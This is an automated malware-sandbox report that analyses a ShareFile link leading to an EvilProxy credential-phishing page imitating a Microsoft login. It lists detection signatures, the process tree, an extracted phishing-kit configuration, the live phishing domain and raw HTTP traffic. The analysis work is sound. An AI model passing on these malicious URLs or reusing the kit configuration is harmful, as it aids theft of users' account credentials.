Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://premierbb.sharefile.com/public/share/web-189361297164461c

Overview

General Information

Sample URL:https://premierbb.sharefile.com/public/share/web-189361297164461c
Analysis ID:1530187
Infos:
Errors
  • URL not reachable

Detection

EvilProxy, HTMLPhisher
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Found malware configuration
Yara detected Evil Proxy Phishing kit
Yara detected HtmlPhish10
Phishing site detected (based on favicon image match)
Phishing site detected (based on image similarity)
Phishing site detected (based on logo match)
Drops files with a non-matching file extension (content does not match file extension)
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found

Classification

  • System is w10x64
  • chrome.exe (PID: 3320 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 2612 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2348 --field-trial-handle=2252,i,4924917487145762283,2033934447409194097,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 1424 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://premierbb.sharefile.com/public/share/web-189361297164461c" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • Acrobat.exe (PID: 5532 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Action-Confidential.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 1864 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 6828 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2056 --field-trial-handle=1632,i,2415105294210288896,4145336450778685438,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 828 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "http://unbouncepages.com/99392004001023/" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 5924 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1980,i,1674931386176375637,9340985270672291635,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
{"pagemsg": "{\\\"LoginPage\\\":{\\\"text\\\":null,\\\"color\\\":\\\"black\\\"},\\\"PassPage\\\":{\\\"text\\\":null,\\\"color\\\":\\\"black\\\"}}", "semail": "", "urlx": "script.php", "lmode": "b"}
SourceRuleDescriptionAuthorStrings
4.10.pages.csvJoeSecurity_EvilProxyYara detected Evil Proxy Phishing kitJoe Security
    4.10.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      4.9.pages.csvJoeSecurity_EvilProxyYara detected Evil Proxy Phishing kitJoe Security
        4.9.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
          5.11.pages.csvJoeSecurity_EvilProxyYara detected Evil Proxy Phishing kitJoe Security
            Click to see the 1 entries
            No Sigma rule has matched
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 4.9.pages.csvMalware Configuration Extractor: Evil Proxy {"pagemsg": "{\\\"LoginPage\\\":{\\\"text\\\":null,\\\"color\\\":\\\"black\\\"},\\\"PassPage\\\":{\\\"text\\\":null,\\\"color\\\":\\\"black\\\"}}", "semail": "", "urlx": "script.php", "lmode": "b"}

            Phishing

            barindex
            Source: https://hrv56k8ryi.ferrovelho.shop/m/86efbfca1e206ccf7a31f8b3bf14aa5e.htmLLM: Score: 9 Reasons: The brand 'Microsoft' is a well-known global technology company., The legitimate domain for Microsoft is 'microsoft.com'., The provided URL 'hrv56k8ryi.ferrovelho.shop' does not match the legitimate domain for Microsoft., The domain 'ferrovelho.shop' is unusual and not associated with Microsoft., The subdomain 'hrv56k8ryi' appears random and does not provide any legitimate context., The use of a '.shop' domain extension is unusual for a technology company like Microsoft., The presence of input fields for 'Email or phone' is common in phishing attempts targeting Microsoft accounts. DOM: 4.10.pages.csv
            Source: Yara matchFile source: 4.10.pages.csv, type: HTML
            Source: Yara matchFile source: 4.9.pages.csv, type: HTML
            Source: Yara matchFile source: 5.11.pages.csv, type: HTML
            Source: Yara matchFile source: 4.10.pages.csv, type: HTML
            Source: Yara matchFile source: 4.9.pages.csv, type: HTML
            Source: Yara matchFile source: 5.11.pages.csv, type: HTML
            Source: https://hrv56k8ryi.ferrovelho.shop/m/86efbfca1e206ccf7a31f8b3bf14aa5e.htmMatcher: Template: microsoft matched with high similarity
            Source: https://hrv56k8ryi.ferrovelho.shop/m/86efbfca1e206ccf7a31f8b3bf14aa5e.htm#Matcher: Template: microsoft matched with high similarity
            Source: https://hrv56k8ryi.ferrovelho.shop/m/86efbfca1e206ccf7a31f8b3bf14aa5e.htmMatcher: Found strong image similarity, brand: MICROSOFT
            Source: https://hrv56k8ryi.ferrovelho.shop/m/86efbfca1e206ccf7a31f8b3bf14aa5e.htmMatcher: Template: microsoft matched
            Source: https://hrv56k8ryi.ferrovelho.shop/m/86efbfca1e206ccf7a31f8b3bf14aa5e.htmMatcher: Template: microsoft matched
            Source: https://hrv56k8ryi.ferrovelho.shop/m/86efbfca1e206ccf7a31f8b3bf14aa5e.htm#Matcher: Template: microsoft matched
            Source: https://hrv56k8ryi.ferrovelho.shop/m/86efbfca1e206ccf7a31f8b3bf14aa5e.htmHTTP Parser: Number of links: 0
            Source: https://premierbb.sharefile.com/share/view/189361297164461cHTTP Parser: Base64 decoded: {"version":3,"sources":["webpack://./node_modules/react-loading-skeleton/dist/skeleton.css"],"names":[],"mappings":"AAAA;EACE;IACE,2BAA2B;EAC7B;AACF;;AAEA;EACE,qBAAqB;EACrB,0BAA0B;EAC1B,0BAA0B;EAC1B,6BAA6B;EAC7B,+BAA+B,EAAE,qBAAqB;;EAEtD,mCAAmC;;EAEnC,WAA...
            Source: https://hrv56k8ryi.ferrovelho.shop/m/86efbfca1e206ccf7a31f8b3bf14aa5e.htmHTTP Parser: Title: KZQ8EW470EOCVG9O4PV3 does not match URL
            Source: https://hrv56k8ryi.ferrovelho.shop/m/86efbfca1e206ccf7a31f8b3bf14aa5e.htmHTTP Parser: Invalid link: Terms of use
            Source: https://hrv56k8ryi.ferrovelho.shop/m/86efbfca1e206ccf7a31f8b3bf14aa5e.htmHTTP Parser: Invalid link: Privacy & cookies
            Source: https://hrv56k8ryi.ferrovelho.shop/m/86efbfca1e206ccf7a31f8b3bf14aa5e.htmHTTP Parser: Invalid link: Terms of use
            Source: https://hrv56k8ryi.ferrovelho.shop/m/86efbfca1e206ccf7a31f8b3bf14aa5e.htmHTTP Parser: Invalid link: Privacy & cookies
            Source: file:///C:/Users/user/Downloads/Action-Confidential.pdfHTTP Parser: No favicon
            Source: file:///C:/Users/user/Downloads/Action-Confidential.pdfHTTP Parser: No favicon
            Source: https://hrv56k8ryi.ferrovelho.shop/m/86efbfca1e206ccf7a31f8b3bf14aa5e.htmHTTP Parser: No <meta name="author".. found
            Source: https://hrv56k8ryi.ferrovelho.shop/m/86efbfca1e206ccf7a31f8b3bf14aa5e.htmHTTP Parser: No <meta name="author".. found
            Source: https://hrv56k8ryi.ferrovelho.shop/m/86efbfca1e206ccf7a31f8b3bf14aa5e.htmHTTP Parser: No <meta name="copyright".. found
            Source: https://hrv56k8ryi.ferrovelho.shop/m/86efbfca1e206ccf7a31f8b3bf14aa5e.htmHTTP Parser: No <meta name="copyright".. found
            Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49717 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 2.19.74.158:443 -> 192.168.2.6:49726 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 2.19.74.158:443 -> 192.168.2.6:49728 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49751 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.6:49787 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49903 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49998 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:50125 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.6:50177 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50193 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50259 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50314 version: TLS 1.2
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 40.113.103.199
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.74.158
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.74.158
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.74.158
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.74.158
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.74.158
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.74.158
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.74.158
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.74.158
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.74.158
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.74.158
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.74.158
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.74.158
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.74.158
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.74.158
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.74.158
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.74.158
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.74.158
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.74.158
            Source: unknownTCP traffic detected without corresponding DNS query: 2.19.74.158
            Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.45
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: text/cssContent-Length: 2944Connection: keep-aliveDate: Wed, 18 Sep 2024 22:47:57 GMTLast-Modified: Wed, 18 Sep 2024 21:13:25 GMTETag: "54bf75d03e588470d1a76cdbd7ab5c1d"x-amz-server-side-encryption: AES256Cache-Control: max-age=31536000Content-Encoding: gzipx-amz-version-id: utZr4xtDVNV4ci6RrOc0u53V1VtRvrrGAccept-Ranges: bytesServer: AmazonS3X-Cache: Hit from cloudfrontVia: 1.1 41f60102fc29156bc5001d6646f75c02.cloudfront.net (CloudFront)X-Amz-Cf-Pop: FRA2-C1X-Amz-Cf-Id: zRx-3O5fcZ19CxYH5QpcDcD7xGmcjjbEIpZ4C14RM95fg8Tv1_LO4g==Age: 1797538Referrer-Policy: no-referrerX-Content-Type-Options: nosniffData Raw: 1f 8b 08 08 6f 42 eb 66 00 03 6d 61 69 6e 2e 63 73 73 00 c5 5b e9 92 a3 38 12 fe bf 4f c1 76 c7 46 57 75 80 c7 1c be 70 cc c4 ee ff 7d 82 9d e8 e8 10 48 36 da 92 81 06 b9 ca d5 84 e7 d9 57 12 87 25 24 83 5c 7b f5 44 4c 1b 91 99 ca f3 4b 01 d9 10 bf 2e 48 e9 95 c5 c9 ab 8a 82 3a fd c5 a1 a8 d8 ff 30 22 70 41 d0 11 a4 ef 4d 59 d4 98 e2 22 8f 41 52 17 e4 4c d1 9e a0 03 8d 97 7b 5a 94 ec ff 27 50 1d 71 ee 25 05 a5 c5 29 f6 83 f2 72 85 b6 b2 1d 02 12 44 66 76 78 40 5c 8d 08 4a e9 9c c6 25 80 10 e7 c7 41 77 f6 23 29 2a 88 aa d8 2f 2f 0e e3 c0 d0 f9 bc 5e af 1f de d8 29 4a be 6d 33 6c b0 08 d0 e9 01 29 14 5d 28 a8 10 70 ed 59 70 5e 9e e9 ef f4 bd 44 bf 72 ee 6f ff 07 db c7 2a c4 b1 77 2a 7e 32 c2 f4 5c 7b 38 cf 51 75 73 48 bf 59 5e e4 e8 61 f7 fe 17 04 2f da 88 d5 7f c7 f5 6c da 54 f8 98 51 a3 0b 1f df f0 b6 57 85 08 a0 f8 15 8d ea 68 fd 50 19 75 52 db 50 e8 76 7c 40 d2 a8 30 07 2d 21 ae 4b 02 de e3 84 14 e9 cb a4 dc 56 99 45 7d 4e 4e 78 ce b7 57 99 71 91 81 da 03 17 5c 3b 5f 9b a4 b8 78 35 fe c9 dd dd 06 98 f9 e7 72 87 9a 5f dd f6 a9 29 53 38 75 fe 8c 4f 65 51 51 90 d3 3b 5c 0b 61 7e dd f4 86 1d 08 ba ec ff 79 ae 29 3e bc 7b 69 91 53 94 53 b1 e8 31 89 d5 3d 29 c2 56 d7 7c af 4d de 3b 37 fb 92 6f 2d cd 00 2c de 44 0e ef 8b 33 25 38 47 6d 42 4f 6c da 16 de 17 2e e7 cb b7 3b 9b c8 84 e8 04 30 b1 a2 a4 e8 3e 9d 9d 4d 6f 18 d2 2c f6 97 cb bf dc b1 a0 c7 6b 05 2f 27 34 b3 46 80 a9 ed fe 4d 21 7d 05 03 82 8f b9 87 29 3a d5 71 ca 92 04 55 7a 09 f7 58 e1 89 64 0f 96 d2 4a 8b 26 db f2 5e 36 ab 25 dd 49 1e 98 fa ad 84 5c 8f 0b be 66 f4 44 9a b4 20 45 15 7f 5e 2e 99 25 20 7d 39 56 c5 39 87 71 75 4c c0 d3 d2 15 ff 3d 5f 93 02 be f3 0e e3 42 e2 42 ea 42 e8 9e 89 5b 10 97 60 37 f3 Data Ascii: oBfmain.css[8OvFWup}H6W%$\{DLK.H:0"pAMY"ARL{Z'Pq%)rDfvx@\J%Aw#)*//^)Jm3l)](pYp^Dro*w*~2\{8QusHY^a/lTQWhPuRPv|@0-!KVE}NNxWq\;_x5r_)S8uOeQQ;\a~y)>{iSS1=)V|M;7o-,D3%8GmBOl.;0>Mo,k/'4FM!}):qUzXdJ&^6%I\fD E^.% }9V9quL=_BBB[`7
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/javascriptContent-Length: 41618Connection: keep-aliveDate: Mon, 09 Sep 2024 20:43:57 GMTLast-Modified: Mon, 09 Sep 2024 20:00:10 GMTETag: "b5949b3be4687909b13b22dfba27d0ea"x-amz-server-side-encryption: AES256Cache-Control: max-age=31536000Content-Encoding: gzipx-amz-version-id: 36sbtEfRDGy2dcgnPBKNKf28_9VinVuPAccept-Ranges: bytesServer: AmazonS3X-Cache: Hit from cloudfrontVia: 1.1 29051585a13addd312c8ac9d527433c6.cloudfront.net (CloudFront)X-Amz-Cf-Pop: FRA2-C1X-Amz-Cf-Id: sgtXO7j8WmdKl31XBdyzl3bfMhQoMJ08rxY-uktbI-WsQ6XRmddFqQ==Age: 2582579Referrer-Policy: no-referrerX-Content-Type-Options: nosniffData Raw: 1f 8b 08 08 c8 53 df 66 00 03 6d 61 69 6e 2e 62 75 6e 64 6c 65 2e 6a 73 00 ec 5b 0b 73 db 46 92 fe 2b 22 f6 4e 05 84 23 88 52 b2 7b 09 68 14 d7 71 9c dd 5c d9 b1 2f 72 2e 55 47 31 2a 90 1c 8a b3 06 31 cc 60 60 59 2b 72 7f fb 7d 3d 0f 0c f8 90 9d b8 72 55 7b 75 57 a5 a2 80 79 f6 f4 f4 e3 eb 9e 41 6f d1 54 33 2d 64 15 57 c9 c3 bb 42 9d a8 fc 61 3b f4 85 27 32 e6 b6 58 0f 15 d7 8d aa 62 35 e6 93 cd 26 d6 39 3d e4 0f 22 e3 ac cc 7a 17 8c bf 5f 4b a5 eb ec 61 bb 65 15 aa d2 59 51 96 b1 4e 5d 39 d3 2c 3c cb 04 2f 65 de 1b 30 9d 24 be 74 2b d3 55 5e 31 99 ce 72 85 df 79 de 52 c6 d1 19 d4 c9 54 d2 63 b2 d9 bc 9a fe 8d cf 74 3a e7 0b 51 f1 d7 4a ae b9 d2 f7 a6 d9 03 af 9a 15 57 c5 b4 e4 19 86 bf e5 3a ab b6 c9 16 e3 a9 ce 78 c9 43 d4 54 b6 f7 3c ea e5 fa 7e cd e5 e2 e4 ea 7e 35 95 e5 e9 a9 fd 9f 6a 79 a5 95 a8 6e df 14 b7 a7 a7 8f cd 78 d8 96 81 5d 65 c3 b3 e8 a5 9c 37 25 8f b6 09 7b ac 73 74 73 c3 6b d7 cc 77 eb 0d 2c b9 3a 90 ab 19 08 16 8b f8 e2 94 9f 9e 82 f1 32 06 d7 d8 97 a7 3c b1 5b 82 bd 41 ed 17 54 1b 49 33 55 94 fb 35 e9 d3 53 fa 4b c3 4c a1 13 6d 6b 95 3b e2 66 8a 17 9a c7 55 53 96 09 0d 07 86 41 22 1e 21 bd 62 11 4a 8a a6 d4 d1 3e c7 ed 2a 34 56 7d 69 08 aa 0d 5f 02 93 75 b2 90 2a 36 82 76 22 40 45 82 9d c6 78 8a 75 77 c7 93 08 31 da a6 53 51 cd 0d 5d 4c 25 89 93 c2 93 8a 78 54 ed 6c a9 91 d2 1c 73 f2 ce 6a 47 6d 8b 76 54 9e 3a da b7 d9 91 ca ad 9f 81 e8 d2 2c 2a 22 48 1c d3 34 9d dc 91 c8 b6 8b 63 d1 5a 49 2d 69 91 e9 b2 a8 5f dd 55 9e 59 56 0f a8 03 8d b1 ce a3 88 49 70 b7 ce 2f 07 c9 36 1e ef 0b 79 d4 d4 fc 84 98 86 5d 1c 1e e7 be 7e 54 70 86 56 81 ab f8 22 19 6a bf cc e3 54 bf 93 62 7e 32 c8 21 28 46 a6 ee c0 Data Ascii: Sfmain.bundle.js[sF+"N#R{hq\/r.UG1*1``Y+r}=rU{uWyAoT3-dWBa;'2Xb5&9="z_KaeYQN]9,</e0$t+U^1ryRTct:QJW:xCT<~~5jynx]e7%{stskw,:2<[ATI3U5SKLmk;fUSA"!bJ>*4V}i_u*6v"@Exuw1SQ]L%xTlsjGmvT:,*"H4cZI-i_UYVIp/6y]~TpV"jTb~2!(F
            Source: global trafficHTTP traffic detected: GET /public/share/web-189361297164461c HTTP/1.1Host: premierbb.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /css/spinner.css HTTP/1.1Host: premierbb.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://premierbb.sharefile.com/public/share/web-189361297164461cAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=lEdzqxr9aneWEdtPlAkuF2UrNTolyncpmb2wqqDkjbOBAoP8c4PaLS/jAtZwkB8Mzf1Nj+rfDC6X+qf3LDYOSkYm9UndzsHbE2XEDLwt2PEwazqJdK5LcFYemqBQpdr5B7MU/rTb3ThP7KtCUbqTGsGCCNTcbWMNCw83EGB+sLTz; AWSALBTGCORS=lEdzqxr9aneWEdtPlAkuF2UrNTolyncpmb2wqqDkjbOBAoP8c4PaLS/jAtZwkB8Mzf1Nj+rfDC6X+qf3LDYOSkYm9UndzsHbE2XEDLwt2PEwazqJdK5LcFYemqBQpdr5B7MU/rTb3ThP7KtCUbqTGsGCCNTcbWMNCw83EGB+sLTz; AWSALB=GdC23EC+aMQbC10Zxya9vnuRSAQlRxphLPP4+S/czVR+v052yvmvfeKnWNRuGJS/YvZcOx0/QmNY8AI+A2U4zGmTb8IqNyXqmwCNWtN+1doo94zW1v+ximyleASy; AWSALBCORS=GdC23EC+aMQbC10Zxya9vnuRSAQlRxphLPP4+S/czVR+v052yvmvfeKnWNRuGJS/YvZcOx0/QmNY8AI+A2U4zGmTb8IqNyXqmwCNWtN+1doo94zW1v+ximyleASy
            Source: global trafficHTTP traffic detected: GET /0093b71e39a6/478ed03bbf12/challenge.js HTTP/1.1Host: 0093b71e39a6.us-east-1.sdk.awswaf.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /bundles/index.563cd3fc21b70465916a.js HTTP/1.1Host: premierbb.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://premierbb.sharefile.com/public/share/web-189361297164461cAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=lEdzqxr9aneWEdtPlAkuF2UrNTolyncpmb2wqqDkjbOBAoP8c4PaLS/jAtZwkB8Mzf1Nj+rfDC6X+qf3LDYOSkYm9UndzsHbE2XEDLwt2PEwazqJdK5LcFYemqBQpdr5B7MU/rTb3ThP7KtCUbqTGsGCCNTcbWMNCw83EGB+sLTz; AWSALBTGCORS=lEdzqxr9aneWEdtPlAkuF2UrNTolyncpmb2wqqDkjbOBAoP8c4PaLS/jAtZwkB8Mzf1Nj+rfDC6X+qf3LDYOSkYm9UndzsHbE2XEDLwt2PEwazqJdK5LcFYemqBQpdr5B7MU/rTb3ThP7KtCUbqTGsGCCNTcbWMNCw83EGB+sLTz; AWSALB=GdC23EC+aMQbC10Zxya9vnuRSAQlRxphLPP4+S/czVR+v052yvmvfeKnWNRuGJS/YvZcOx0/QmNY8AI+A2U4zGmTb8IqNyXqmwCNWtN+1doo94zW1v+ximyleASy; AWSALBCORS=GdC23EC+aMQbC10Zxya9vnuRSAQlRxphLPP4+S/czVR+v052yvmvfeKnWNRuGJS/YvZcOx0/QmNY8AI+A2U4zGmTb8IqNyXqmwCNWtN+1doo94zW1v+ximyleASy
            Source: global trafficHTTP traffic detected: GET /css/sharefilebrand/sf-spinner.svg HTTP/1.1Host: premierbb.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://premierbb.sharefile.com/css/spinner.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=yeaoNvKSa+w+/n+txt0pbKRB6mstD+XeKa8kLTOIyBOap7p7cflZLtpF2x7ATHR7DRxkDbsTCDsJkS3gU56W6M5mlTs/Vx282d2X723Vl/wTgnuuqfn+Pk3kLcZQ6Q8Ymk6j85+osRe7v6H4/N0W5xOyAVQa/wuahiZEsF7M3dwJ; AWSALBTGCORS=yeaoNvKSa+w+/n+txt0pbKRB6mstD+XeKa8kLTOIyBOap7p7cflZLtpF2x7ATHR7DRxkDbsTCDsJkS3gU56W6M5mlTs/Vx282d2X723Vl/wTgnuuqfn+Pk3kLcZQ6Q8Ymk6j85+osRe7v6H4/N0W5xOyAVQa/wuahiZEsF7M3dwJ; AWSALB=5uI9CDeQ1KRrzqyqh7Omqb0TVvbacFIAp+0dpQxnyjPT+FEicmXlL8JnGNtR7BYYRveFGdMTiik9JDta3G0pPu8PDkl0Uzzado0rPBVvQhEaOq0OhZ6SuGRNsn6x; AWSALBCORS=5uI9CDeQ1KRrzqyqh7Omqb0TVvbacFIAp+0dpQxnyjPT+FEicmXlL8JnGNtR7BYYRveFGdMTiik9JDta3G0pPu8PDkl0Uzzado0rPBVvQhEaOq0OhZ6SuGRNsn6x
            Source: global trafficHTTP traffic detected: GET /0093b71e39a6/478ed03bbf12/challenge.js HTTP/1.1Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
